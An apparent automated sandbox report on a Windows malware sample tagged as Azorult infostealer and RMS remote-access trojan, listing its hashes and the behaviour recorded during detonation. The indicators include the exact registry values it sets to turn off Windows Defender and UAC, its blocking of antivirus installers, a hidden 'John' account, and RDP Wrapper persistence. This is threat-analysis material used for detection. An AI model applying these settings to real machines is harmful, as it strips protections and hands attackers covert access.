SHA256 c4bf2907919a7349cecc059f8607621ef795dd3f779c347ddecc2649e639179e
SHA512 502047c54dedd7344f317780f9327715ff69f7600252710bf093daa996f4f65b6ea64bf12e4e078a05ed681aa2c59041a79becfdd46174f2ef68473418ea3f8f

memory/5456-20-0x0000000000400000-0x0000000000537000-memory.dmp

memory/5456-21-0x0000000002440000-0x000000000255A000-memory.dmp

memory/5908-22-0x0000000000400000-0x0000000000537000-memory.dmp

memory/5908-26-0x0000000000400000-0x0000000000537000-memory.dmp

memory/5908-27-0x0000000000400000-0x0000000000537000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Modifies visiblity of hidden/system files in Explorer

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Programdata\RealtekHD\taskhostw.exe N/A

RMS

trojan rat rms

Rms family

rms

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Windows security bypass

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\regedit.exe N/A

Grants admin privileges

Remote Service Session Hijacking: RDP Hijacking

lateral_movement
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\net.exe N/A
N/A N/A C:\Windows\SysWOW64\net1.exe N/A

Blocks application from running via registry modification

defense_evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\conhost.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\conhost.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\cmd.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Server Software Component: Terminal Services DLL

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" C:\rdp\RDPWInst.exe N/A

Sets file to hidden

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Stops running service(s)

defense_evasion execution

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\wini.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\programdata\install\cheat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\programdata\microsoft\intel\R8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\svchost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\Programdata\RealtekHD\taskhostw.exe N/A

Checks whether UAC is enabled

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" C:\rdp\RDPWInst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A

Password Policy Discovery

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\rfxvmt.dll C:\rdp\RDPWInst.exe N/A

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" C:\Windows\SysWOW64\reg.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Common Files\System\iexplore.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\ByteFence C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\360 C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\AVG C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Program Files\RDP Wrapper C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Program Files (x86)\Zaxar C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\COMODO C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\Kaspersky Lab C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\Panda Security C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.dll C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\Cezurity C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\Cezurity C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\360\Total Security C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.ini C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Program Files\ESET C:\ProgramData\Microsoft\Intel\taskhost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\NetworkDistribution C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File created C:\Windows\java.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Windows\java.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File created C:\Windows\boy.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Windows\boy.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File created C:\Windows\svchost.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
File opened for modification C:\Windows\svchost.exe C:\ProgramData\Microsoft\Intel\taskhost.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
